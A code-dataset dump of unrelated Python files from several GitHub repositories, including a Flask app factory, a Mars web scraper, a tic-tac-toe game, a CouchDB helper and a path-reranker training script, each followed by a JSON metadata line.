parser.add_argument(\"@@LSFuzzypred\",\t\tdest=\"lsfuzzypred\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictFuzzyPredicates. Default is False.\")\n parser.add_argument(\"@@LSSempred\",\t\tdest=\"lssempred\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_predicates import SemprePredicates. Default is False.\")\n parser.add_argument(\"@@LSSempredfuzzy\",\tdest=\"lssempredfuzzy\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_predicates import SemprePredicatesFuzzy. Default is False.\")\n parser.add_argument(\"@@LSEnt\",\t\tdest=\"lsent\",\t\tnargs=2, default=[],\n\t\t help=\"from linguistics.similarity_qa import EntityLinkingCost. 
Default is False.\")\n parser.add_argument(\"@@LSBent\",\t\tdest=\"lsbent\",\t\tnargs=2, default=[],\n\t\t help=\"from linguistics.similarity_qa import BridgeLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSPred\",\t\tdest=\"lspred\",\t\tnargs=2, default=[],\n\t\t help=\"from linguistics.similarity_qa import PredicateLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSWildrecog\",\t\tdest=\"lswildrecog\",\tnargs='?', default=0.0,\n\t\t help=\"from linguistics.similarity_qa import UriSurfCost. Default is 0.0.\")\n parser.add_argument(\"@@LSRules\",\t\tdest=\"lsrules\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_rules import DictionaryRules. Default is False.\")\n parser.add_argument(\"@@LSLex\",\t\tdest=\"lslex\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_costs import LexicalSimilarity. Default is False.\")\n parser.add_argument(\"@@LSVari\",\t\tdest=\"lsvari\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import VariableDifferenceIndividual. Default is False.\")\n parser.add_argument(\"@@LSEnti\",\t\tdest=\"lsenti\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import EntityDifferenceIndividual. Default is False.\")\n parser.add_argument(\"@@LSVar\",\t\tdest=\"lsvar\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import VariableDifference. Default is False.\")\n parser.add_argument(\"@@LSEntDiff\",\t\tdest=\"lsentdiff\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import EntityDifference. Default is False.\")\n parser.add_argument(\"@@LSComp\",\t\tdest=\"lscomp\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import TreeDifferenceComplexity. Default is False.\")\n parser.add_argument(\"@@LSSize\",\t\tdest=\"lssize\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import TreeSize. Default is False.\")\n parser.add_argument(\"@@LSCount\",\t\tdest=\"lscount\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_qa import CountOp. Default is False.\")\n parser.add_argument(\"@@NoStrings\",\t\tdest=\"nostrings\",\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_logics import StringRulesInfiniteCost. Default is False.\")\n parser.add_argument(\"@@LSAlign\",\t\tdest=\"lsalign\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_align import AlignmentCost. Default is False.\")\n parser.add_argument(\"@@LSNP\",\t\tdest=\"lsnp\",\t\tnargs='*',\tdefault=0.0,\n\t\t help=\"from linguistics.similarity_qa import NounPhraseCost. Default is False.\")\n parser.add_argument(\"@@LSPNSP\",\t\tdest=\"lspnsp\",\t\tnargs='?',\ttype=float, default=[],\n\t\t help=\"from linguistics.similarity_pre import NoSimilarityPre. Default is False.\")\n parser.add_argument(\"@@LSNSQA\",\t\tdest=\"lsnsqa\",\t\tnargs='*',\tdefault=[],\n\t\t help=\"from linguistics.similarity_qa import NoSimilarityQA. Default is False.\")\n parser.add_argument(\"@@LSPHDWC\",\t\tdest=\"lsphdwc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import DistributedWordCost. Default is False.\")\n parser.add_argument(\"@@LSPHPC\",\t\tdest=\"lsphpc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import PhraseCost. 
Default is False.\")\n parser.add_argument(\"@@LSPHPCA\",\t\tdest=\"lsphpca\",\t\tnargs=3,\tdefault=[],\n\t\t help=\"from linguistics.similarity_phrases_ag import PhraseCost. Default is False.\")\n parser.add_argument(\"@@LSApprox\",\t\tdest=\"lsapprox\",\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_approx import ApproximateMatch. Default is False.\")\n parser.add_argument(\"@@LSFree\",\t\tdest=\"lsfree\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_freebase import EntityLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSURISurf\",\t\tdest=\"lsurisurf\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_urisurf import URISurfCost. Default is False.\")\n parser.add_argument(\"@@LSBridge\",\t\tdest=\"lsbridge\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_bridge import BridgeCost. Default is False.\")\n parser.add_argument(\"@@LSPHNSP\",\t\tdest=\"lsphnsp\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import NoSimilarityPhrases. Default is False.\")\n parser.add_argument(\"@@LSPHLSP\",\t\tdest=\"lsphlsp\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import LeafSimilarityPhrases. Default is False.\")\n parser.add_argument(\"@@LSPHPCAG\",\t\tdest=\"lsphpcag\",\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases_ag import PhraseCostGuesser. Default is False.\")\n parser.add_argument(\"@@LSPHPCG\",\t\tdest=\"lsphpcg\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n help=\"from linguistics.similarity_phrases import PhraseCostGuesser. Default is False.\")\n\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.WARNING)\n\n ruleExtractor = ExtractorParser(args)\n ruleExtractor.run()\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n traceback.print_exc(file=sys.stderr)\n sys.exit(255)\n","repo_name":"pasmargo/t2t-qa","sub_path":"alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":29258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"18462497000","text":"import re\nimport string\nfrom random import choice\n\nfrom newick import dumps\n\nfrom actions import ask_if_finished, get_integer\nfrom phylogenetic_trees.trees import PhyTree\n\n\ndef modify(file_name: str, tree: PhyTree):\n finished = False\n while not finished:\n print(\"Tree has following groups:\")\n print(tree.get_nodes())\n print(\"Add leaf:\")\n node = input()\n if re.match(r\"[{} ]\", node):\n print(\"Leaf name can not include {, }, and space\")\n continue\n print(f\"Add leaf '{node}' to group:\")\n group = input()\n if not re.match(r'[{}]', group):\n print(\"Target group has to be enclosed by {} brackets\")\n continue\n current_structure = dumps(tree.get_newick())\n try:\n tree.add_to_group(node, group)\n except ValueError as e:\n print(e)\n tree.parse_string(current_structure)\n finished = ask_if_finished()\n tree.save(file_name)\n\n\ndef create(file_name: str):\n tree = PhyTree()\n modify(file_name, tree)\n\n\ndef update(file_name: str):\n tree = PhyTree()\n tree.load_file(file_name)\n modify(file_name, tree)\n\n\ndef random_tree(file_name: str, leaves_num: int = 0):\n if leaves_num == 0:\n print(\"Number of leaves:\")\n leaves_num = get_integer()\n\n leaves_queue = string.ascii_uppercase[:leaves_num]\n\n tree = PhyTree()\n for l 
in leaves_queue:\n available_nodes = list(filter(lambda n: re.match(r\"{[a-zA-Z0-9]*}\", n), tree.get_nodes()))\n chosen_node = choice(available_nodes)\n tree.add_to_group(l, chosen_node)\n\n tree.save(file_name)\n","repo_name":"NightCrawler96/Kalkulator-drzew-filogenetycznych","sub_path":"actions/create_tree.py","file_name":"create_tree.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31804407424","text":"from api.api import api\nfrom api.config import app_config\nfrom api.forex_models import db\nfrom api.model_handler import DbUtils\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom loguru import logger\nimport os\n\ndef create_app(config_name):\n \"\"\"\n\n :param config:\n :return:\n \"\"\"\n logger.info(f\"Setting up flask backend for {config_name}\")\n web_app = Flask(__name__, instance_relative_config=True)\n CORS(web_app)\n config=app_config[config_name]\n web_app.config.from_object(config)\n register_extensions(web_app)\n DbUtils.recreate_db(config.SQLALCHEMY_DATABASE_URI)\n logger.info(\"Flask backend successfully created\")\n return web_app\n\n\ndef register_extensions(web_app):\n \"\"\"\n\n :param web_app:\n :return:\n \"\"\"\n logger.info(\"Registering extensions\")\n api.init_app(web_app)\n db.init_app(web_app)\n logger.info(\"Extensions registered\")\n\n\n# Loguru function, centralizes logging and provides better exceptions\n#with logger.catch():\nif __name__ == '__main__':\n config_name = os.environ.get(\"APP_ENVIRONMENT\")\n app = create_app(config_name)\n app.run(host='0.0.0.0', port=80, threaded=True)\n","repo_name":"paul-armstrong-dev/ebury_trader","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28448796385","text":"#!/usr/bin/python\nimport sys\nimport os\nimport subprocess\nimport time\nimport select\n\n\ndef main():\n print(\"--- Cryptomotor v1.0 ---\")\n print(\"Selecciona una de las opciones\")\n print(\"1.--> Generar nuevas claves de encriptacion\")\n print(\"2.--> Encriptar un documento\")\n print(\"3.--> Descencriptar un documento\")\n print(\"4.--> Firmar un documento\")\n print(\"5.--> Verificar un documento\")\n print(\"otro --> Salir\")\n argumento = input()\n if (argumento == \"1\"):\n callCryptoMotor()\n elif (argumento == \"4\"):\n callHashFunction(\"../hcryptomotor/test/testfiles/test.pdf\")\n\ndef callCryptoMotor():\n subprocess.run([\"../hcryptomotor/.stack-work/install/x86_64-linux-tinfo6/0ede982d3f8e41d7cefbca13c6f922878b5a782887477c6d0108f39e91a3b7a1/8.10.7/bin/hcryptomotor-genkey\"])\n print(\"LLaves generadas con exito\")\n return 0\n\ndef callHashFunction(filepath):\n callhash = subprocess.Popen([\"../hcryptomotor/bins/sha384sum\", filepath], stdout=subprocess.PIPE)\n handler = select.poll()\n handler.register(callhash.stdout, select.POLLIN)\n hashString = callhash.stdout.readline()\n getHashFromString(hashString)\n\ndef getHashFromString(hashString):\n hash = hashString.split()\n print(str(hash[0] == \"1\"))\n\n\n\nmain()\n","repo_name":"kaledcorona/Hermes","sub_path":"Cryptomotor/pwrapper/cryptomotor.py","file_name":"cryptomotor.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4576975176","text":"#!/usr/bin/env python\n\nimport sys\nimport couchdb\nfrom htsint.database import 
Couch\nfrom htsint import __basedir__\nsys.path.append(__basedir__)\ntry:\n from configure import CONFIG\nexcept:\n CONFIG = {'dbhost':'localhost','dbport':'5984'}\n\n#class HtsDb(Couch):\n# \"\"\"\n# A generic class\n# \"\"\"\n\n\nclass HtsDb(object):\n\n def __init__(self):\n \"\"\" \n initialize class to handle several couchdbs \n \"\"\"\n\n self.dbnames = ['htsint-uniprot','htsint-gene','htsint-go','htsint-taxa']\n self.db = {}\n self.server = couchdb.Server(\"http://%s:%s/\"%(CONFIG['dbhost'],CONFIG['dbport']))\n \n def connect(self):\n \"\"\"\n connect to the htsint specific databases\n \"\"\"\n\n for dbname in self.dbnames:\n self.db[dbname] = self.server[dbname]\n\n def save_doc(self,dbname,doc):\n \"\"\"\n save a document into a database\n \"\"\"\n\n self.db[dbname].save(doc)\n\n# If your CouchDB server is running elsewhere, set it up like this:\n#couch = couchdb.Server('http://example.com:5984/')\n\n# select database\n#db = couch['mydb']\n\n#create a document and insert it into the db:\n#doc = {'foo': 'bar'}\n#db.save(doc)\n","repo_name":"ajrichards/htsint","sub_path":"htsint/database/old/HtsDb.py","file_name":"HtsDb.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"29645703881","text":"#!/usr/bin/python\n\n\"\"\"\ncisco_neighbor_handlers_ut contains unit tests for functions in the\ncisco_neighbor_handlers library\n\"\"\"\n\n\n# Built-In Libraries\nimport os\nimport sys\nimport json\nimport logging\nimport argparse\nfrom builtins import input\n\n# Autoshell Libraries\nfor each in os.walk(os.path.pardir):\n sys.path.append(each[0])\nimport autoshell.cisco.neighbors.handlers as handlers\n\nlog = logging.getLogger(\"modules\")\nconsoleHandler = logging.StreamHandler()\nfmt = \"\"\"\\\n%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\"\"\"\nformat = logging.Formatter(fmt)\nconsoleHandler.setFormatter(format)\nlog.addHandler(consoleHandler)\nlog.setLevel(logging.DEBUG)\n\n\ndef multilineinput(ending):\n result = \"\"\n done = False\n while not done:\n data = input()\n if data == ending:\n done = True\n else:\n result += data+\"\\n\"\n return result\n\n\nclass fake_host:\n def send_command(self, command):\n log.info(\"test_cisco_ios_neighbor_handler:\\\n Input '%s' output\\\n ending with '^' on a line by itself\" % command)\n return multilineinput(\"^\")\n\n\ndef test_cisco_ios_neighbor_handler():\n host = fake_host()\n data = handlers.cisco_ios_neighbor_handler(host)\n log.info(\"Result:\\n%s\" % json.dumps(data, indent=4))\n\n\ndef run_tests(args):\n if args.test_cisco_ios_neighbor_handler:\n test_cisco_ios_neighbor_handler()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='AutoShell - Module Library Test Suite')\n parser.add_argument(\n '-c', \"--test_cisco_ios_neighbor_handler\",\n help=\"Run test_cisco_ios_neighbor_handler\",\n dest=\"test_cisco_ios_neighbor_handler\",\n action='store_true')\n args = parser.parse_args()\n run_tests(args)\n","repo_name":"PackeTsar/autoshell","sub_path":"tests/cisco_neighbors_handlers_ut.py","file_name":"cisco_neighbors_handlers_ut.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"3337522639","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Import Splinter and BeautifulSoup\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nfrom 
webdriver_manager.chrome import ChromeDriverManager\n# Need to use Pandas' read_html() function.\nimport pandas as pd\n\n\n# In[2]:\n\n\n# Create ChromeDriver executable path.\nexecutable_path = {'executable_path': ChromeDriverManager().install()}\nbrowser = Browser('chrome', **executable_path, headless=False)\n\n\n# ### Scrape the news data.\n\n# In[3]:\n\n\n# Visit the URL.\nurl = 'https://redplanetscience.com'\nbrowser.visit(url)\n# Optional delay for loading the page.\nbrowser.is_element_present_by_css('div.list_text', wait_time=1)\n\n\n# In[4]:\n\n\n# Set up HTML parser.\nhtml = browser.html\nnews_soup = soup(html, 'html.parser')\nslide_elem = news_soup.select_one('div.list_text')\n\n\n# In[5]:\n\n\n# Find the data from the slide_elem - content title.\nnews_title = slide_elem.find('div', class_='content_title').get_text()\nnews_title\n\n\n# In[6]:\n\n\n# Find the paragraph text from the slide_elem.\nnews_p = slide_elem.find('div', class_='article_teaser_body').get_text()\nnews_p\n\n\n# ### Scrape the image.\n\n# In[7]:\n\n\n# Visit the URL.\nurl = 'https://spaceimages-mars.com'\nbrowser.visit(url)\n\n\n# In[8]:\n\n\n# Find and click the \"Full Image\" button.\nfull_image_elem = browser.find_by_tag('button')[1]\nfull_image_elem.click()\n\n\n# In[9]:\n\n\n# New webpage means we have to parse the HTML again.\nhtml = browser.html\nimg_soup = soup(html, 'html.parser')\n\n\n# In[10]:\n\n\n# Find the relative image url (ever-changing).\nimg_url_rel = img_soup.find('img', class_='fancybox-image').get('src')\nimg_url_rel\n\n\n# In[11]:\n\n\n# Use the base URL to create an absolute URL.\nimg_url = f'https://spaceimages-mars.com/{img_url_rel}'\nimg_url\n\n\n# ### Scrape table of data.\n\n# In[12]:\n\n\n# Read the data from the website, store the first table element as a DataFrame\ndf = pd.read_html('https://galaxyfacts-mars.com')[0]\n# Name the columns in the new DF.\ndf.columns = ['description', 'Mars', 'Earth']\n# Set the index to the different categories/descriptors.\ndf.set_index('description', inplace=True)\ndf\n\n\n# In[13]:\n\n\n# View the DataFrame as HTML.\ndf.to_html()\n\n\n# # D1: Scrape High-Resolution Mars’ Hemisphere Images and Titles\n\n# In[14]:\n\n\n# 1. Use browser to visit the URL \nurl = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\nbrowser.visit(url)\n\n\n# In[15]:\n\n\n# 2. Create a list to hold the images and titles.\nhemisphere_image_urls = []\n\n# 3. Write code to retrieve the image urls and titles for each hemisphere.\n# Parse the html.\nhtml = browser.html\npage_soup = soup(html, 'html.parser')\n\n# Find all the \nimage_divs = page_soup.find_all('div', class_='description')\nfor image in image_divs:\n #Create empty dictionary to store title and URL.\n hemisphere_dict = {}\n \n # Get the title of the image.\n title = image.find('h3').text\n \n # Create the URL to access the page with the HD image, and visit it.\n create_url = f\"https://astrogeology.usgs.gov{image.find('a').get('href')}\"\n browser.visit(create_url)\n \n # Parse the image webpage.\n image_page_soup = soup(browser.html, 'html.parser')\n \n # Get the url of the image, combine into a full URL.\n full_res_url = image_page_soup.find('div', class_='downloads').find('a').get('href')\n\n # Populate the dictionary and add it to the main list.\n hemisphere_dict['img_url'] = full_res_url\n hemisphere_dict['title'] = title\n hemisphere_image_urls.append(hemisphere_dict)\n\n\n# In[16]:\n\n\n# 4. 
Print the list that holds the dictionary of each image url and title.\nhemisphere_image_urls\n\n\n# In[17]:\n\n\n# 5. Quit the browser\nbrowser.quit()\n\n","repo_name":"SDCoulter/Mission-to-Mars","sub_path":"Mission_to_Mars_Challenge.py","file_name":"Mission_to_Mars_Challenge.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27958576227","text":"import random\ndef printBoard(board):\n print(board[0] + '|' + board[1] + '|' + board[2])\n print('-+-+-')\n print(board[3] + '|' + board[4] + '|' + board[5])\n print('-+-+-')\n print(board[6] + '|' + board[7] + '|' + board[8])\n print()\n print()\n\ndef win(board):\n if (board[0] == board[1] == board[2]):\n return (board[0]== 'x' or board[0] == 'o')\n if (board[3] == board[4] == board[5]):\n return (board[3] == 'x' or board[3] == 'o')\n if (board[6] == board[7] == board[8]):\n return (board[6] == 'x' or board[6] == 'o')\n if (board[0] == board[3] == board[6]):\n return (board[0][0] == 'x' or board[0] == 'o')\n if (board[1] == board[4] == board[7]):\n return (board[1] == 'x' or board[1] == 'o')\n if (board[2] == board[5] == board[8]):\n return (board[2] == 'x' or board[2] == 'o')\n if (board[0] == board[4] == board[8]):\n return (board[0] == 'x' or board[0] == 'o')\n if (board[2] == board[4] == board[6]):\n return (board[2] == 'x' or board[2] == 'o')\n return False\n\ndef move (board,player,position):\n board[position]= player\n return board\n\ndef position():\n print('Ingrese una posición donde desea colocar su pieza')\n position = int(input())\n return position\n\ndef autoposition(board):\n return random.choice(positionToChoose(board))\n\ndef positionToChoose(board):\n positionToChoose = []\n for index in range(len(board)):\n if (board[index] == ' '):\n positionToChoose.append(index)\n return positionToChoose\n\ndef choosePiece():\n print('Elija el tipo de pieza a utilizar para el jugador 1')\n player1 = input()\n return player1\n\ndef oposite(player1):\n if player1 == 'o' :\n return 'x'\n else:\n return 'o'\n\ndef play(player1,player2,round,board):\n state = 'Usted ha Empatado'\n for round in range(1,9):\n if (round % 2 == 0):\n board = move(board,player2,autoposition(board))\n else :\n board = move(board,player1,position())\n printBoard(board)\n if(win(board)):\n state = win_or_loose(round)\n break\n return state\n\ndef win_or_loose(result):\n if (result % 2 == 0):\n return 'Usted ha perdido'\n else:\n return 'Usted ha ganado'\ndef game():\n player1 = choosePiece()\n player2 = oposite(player1)\n board = [' ',' ',' ',' ',' ',' ',' ',' ',' ']\n result = play(player1,player2,round,board)\n print(result)\ngame()","repo_name":"fedemozzon/Ta-Te-Ti","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20046175325","text":"'''from Tkinter import *\nimport tkMessageBox\nimport Tkinter\n\ntop = Tkinter.Tk()\n\nCheckVar1 = IntVar()\nCheckVar2 = IntVar()\nC1 = Checkbutton(top, text = \"Music\", variable = CheckVar1, \\\n onvalue = 1, offvalue = 0, height=5, \\\n width = 20)\nC2 = Checkbutton(top, text = \"Video\", variable = CheckVar2, \\\n onvalue = 1, offvalue = 0, height=5, \\\n width = 20)\nC1.pack()\nC2.pack()\ntop.mainloop()\n\n\nfrom Tkinter import *\nclass App(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n\n\n# create the application\nmyapp = 
App()\n\n#\n# here are method calls to the window manager class\n#\nmyapp.master.title(\"My Do-Nothing Application\")\nmyapp.master.minsize(400,50)\nmyapp.master.maxsize(1000, 400)\n\n# start the program\nmyapp.mainloop()\nmyapp.destroy()\n\n'''\n\nfrom Tkinter import *\n\nm1 = PanedWindow()\nm1.pack(fill=BOTH, expand=1)\n\nleft = Label(m1, text=\"left pane\")\nm1.add(left)\n\nm2 = PanedWindow(m1, orient=VERTICAL)\nm1.add(m2)\n\ntop = Label(m2, text=\"top pane\")\nm2.add(top)\n\nbottom = Label(m2, text=\"bottom pane\")\nm2.add(bottom)\n\nmainloop()","repo_name":"rjjanney/searchGFX2","sub_path":"Tkinter_Test.py","file_name":"Tkinter_Test.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37271904922","text":"from env import R2RBatch\nfrom refer360_env import Refer360Batch\nfrom utils import Tokenizer, read_vocab\nfrom vocab import TRAIN_VOCAB\nfrom train import make_arg_parser\nfrom utils import get_arguments\nfrom pprint import pprint\nimport os\narg_parser = make_arg_parser()\narg_parser.add_argument('--cache_path', type=str,\n required=True)\nargs = get_arguments(arg_parser)\nvocab = read_vocab(TRAIN_VOCAB, args.language)\ntok = Tokenizer(vocab)\n\nif args.env == 'r2r':\n EnvBatch = R2RBatch\nelif args.env in ['refer360']:\n EnvBatch = Refer360Batch\nif args.prefix in ['refer360', 'r2r', 'R2R', 'REVERIE', 'r360tiny', 'RxR_en-ALL']:\n val_splits = ['val_unseen', 'val_seen']\n target = 'val_unseen'\nelif args.prefix in ['touchdown', 'td']:\n val_splits = ['dev']\n target = 'dev'\n\nenv = EnvBatch(['none'],\n splits=['train'] + val_splits,\n tokenizer=tok,\n args=args)\nif args.env == 'r2r':\n error_margin = 3.0\nelif args.env in ['refer360']:\n error_margin = env.distances[0][1] * (2**0.5) + 1\n\n\nimport torch\nimport torch.nn as nn\nimport json\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\n\nclass Net(nn.Module):\n def __init__(self, input_dim):\n super(Net, self).__init__()\n if args.env == 'r2r':\n self.net = nn.Sequential(\n nn.BatchNorm1d(input_dim),\n nn.Linear(input_dim, input_dim),\n nn.BatchNorm1d(input_dim),\n nn.Tanh(),\n nn.Linear(input_dim, 1)\n )\n elif args.env == 'refer360':\n self.net = nn.Sequential(\n nn.Linear(input_dim, input_dim),\n nn.Tanh(),\n nn.Linear(input_dim, 1)\n )\n else:\n raise NotImplementedError()\n\n def forward(self, x):\n\n x = self.net(x).squeeze(-1)\n return x\n\n\ndef average(_l):\n return float(sum(_l)) / len(_l)\n\n\ndef count_prefix_len(l1, l2):\n res = 0\n while(res < len(l1) and res < len(l2) and l1[res] == l2[res]):\n res += 1\n return res\n\n\ndef get_path_len(scanId, path):\n path_len = 0\n prev = path[0]\n for curr in path[1:]:\n if args.env == 'r2r':\n distance = env.distances[scanId][prev][curr]\n elif args.env == 'refer360':\n distance = env.distances[prev][curr]\n else:\n raise NotImplementedError()\n path_len += distance\n\n\ndef load_data(filenames, split_names):\n all_data = {}\n for fn in filenames:\n\n split = ''\n for split_name in split_names:\n if split_name in fn:\n split = split_name\n break\n assert split != ''\n\n with open(fn, 'r') as f:\n train_file = json.loads(f.read())\n train_instrs = list(train_file.keys())\n train_data = {}\n\n for instr_id in train_instrs:\n path_id = instr_id.split('_')[0]\n scanId = env.gt[path_id]['scan']\n new_data = {\n 'instr_id': instr_id,\n 'candidates': [],\n 'candidates_path': [],\n 'reranker_inputs': [],\n 'distance': [],\n 'gt': 
env.gt[path_id],\n 'gold_idx': -1,\n 'goal_viewpointId': env.gt[path_id]['path'][-1],\n 'gold_len': get_path_len(scanId, env.gt[path_id]['path']),\n }\n self_len = 0\n for i, candidate in enumerate(train_file[instr_id]):\n _, world_states, actions, sum_logits, mean_logits, sum_logp, mean_logp, pm, speaker, scorer = candidate\n new_data['candidates'].append(candidate)\n new_data['candidates_path'].append([ws[1] for ws in world_states])\n new_data['reranker_inputs'].append(\n [len(world_states), sum_logits, mean_logits, sum_logp, mean_logp, pm, speaker] * 4)\n\n if args.env == 'r2r':\n distance = env.distances[scanId][world_states[-1]\n [1]][new_data['goal_viewpointId']]\n elif args.env == 'refer360':\n distance = env.distances[world_states[-1]\n [1]][new_data['goal_viewpointId']]\n else:\n raise NotImplementedError()\n\n new_data['distance'].append(distance)\n my_path = [ws[1] for ws in world_states]\n if my_path == env.gt[path_id]['path']:\n new_data['gold_idx'] = i\n\n new_data['self_len'] = self_len\n train_data[instr_id] = new_data\n\n print(fn)\n print('gold', average([d['gold_idx'] != -1 for d in train_data.values()]))\n print('oracle', average(\n [any([dis < error_margin for dis in d['distance']]) for d in train_data.values()]))\n all_data[split] = train_data\n\n return all_data\n\n\ncache_list = []\nfor _f in os.listdir(args.cache_path):\n if 'json' not in _f or 'cache' not in _f:\n continue\n cache_file = os.path.join(args.cache_path, _f)\n cache_list.append(cache_file)\n\nprint('Cache list\\n')\nprint('\\n'.join(cache_list))\ndata_splits = load_data(cache_list, ['train'] + val_splits)\n\nnet = Net(28).cuda()\n\nbatch_labels = []\nvalid_points = 0\n\nfor training_point in data_splits['train'].values():\n labels = training_point['distance']\n gold_idx = np.argmin(labels)\n ac_len = len(labels)\n choice = 1\n x_1 = []\n x_2 = []\n if choice == 1:\n for i in range(ac_len):\n for j in range(ac_len):\n if labels[i] <= error_margin and labels[j] > error_margin:\n x_1.append(i)\n x_2.append(j)\n valid_points += 1\n else:\n for i in range(ac_len):\n if labels[i] > error_margin:\n x_1.append(gold_idx)\n x_2.append(i)\n valid_points += 1\n batch_labels.append((x_1, x_2))\n\nprint(valid_points)\n\n\nx_1 = []\nx_2 = []\noptimizer = optim.SGD(net.parameters(), lr=0.00005, momentum=0.6)\nbest_performance = 0.0\nfor epoch in range(30): # loop over the dataset multiple times\n epoch_loss = 0\n for i, (instr_id, training_point) in enumerate(data_splits['train'].items()):\n inputs = training_point['reranker_inputs']\n labels = training_point['distance']\n ac_len = len(labels)\n\n inputs = torch.stack([torch.Tensor(r) for r in inputs]).cuda()\n labels = torch.Tensor(labels)\n\n scores = net(inputs)\n\n if i % 10 == 0 and len(x_1):\n x1 = torch.cat(x_1, 0)\n x2 = torch.cat(x_2, 0)\n loss = F.relu(1.0 - (x1 - x2)).mean()\n #s = x1-x2\n #loss = (-s + torch.log(1 + torch.exp(s))).mean()\n loss.backward()\n epoch_loss += loss.item()\n optimizer.step()\n optimizer.zero_grad()\n x_1 = []\n x_2 = []\n\n if len(batch_labels[i][0]) > 0:\n x_1.append(scores[batch_labels[i][0]])\n x_2.append(scores[batch_labels[i][1]])\n\n print('epoch', epoch, 'loss', epoch_loss)\n\n for env_name in ['train'] + val_splits:\n successes = []\n data_dict = data_splits[env_name]\n for instr_id, point in data_dict.items():\n inputs = point['reranker_inputs']\n labels = point['distance']\n inputs = torch.stack([torch.Tensor(r) for r in inputs]).cuda()\n\n labels = torch.Tensor(labels)\n scores = net(inputs)\n pred = 
scores.max(0)[1].item()\n successes.append(int(labels[pred] <= error_margin))\n print(env_name, average(successes))\n if env_name is target and average(successes) > best_performance:\n best_performance = average(successes)\n save_path = os.path.join(\n args.cache_path, 'candidates_ranker_{}_{}'.format(env_name, best_performance))\n print('saving to', save_path)\n torch.save(net.state_dict(), save_path)\n\nprint('Finished Training')\n\nfor env_name in ['train'] + [target]:\n data_dict = data_splits[env_name]\n successes = []\n inspect = [1, 2, 3, 4, 5, 6]\n other_success = [[] for _ in range(len(inspect))]\n spl = []\n for instr_id, point in data_dict.items():\n inputs = point['reranker_inputs']\n labels = point['distance']\n inputs = torch.stack([torch.Tensor(r) for r in inputs]).cuda()\n labels = torch.Tensor(labels)\n scores = net(inputs)\n\n pred = scores.max(0)[1].item()\n successes.append(int(labels[pred] < error_margin))\n\n if (int(labels[pred] < error_margin)):\n for i in range(len(point['distance'])):\n pass\n #print( point['reranker_inputs'][i])\n #print( scores[i].item(), point['distance'][i], point['reranker_inputs'][i][5])\n # 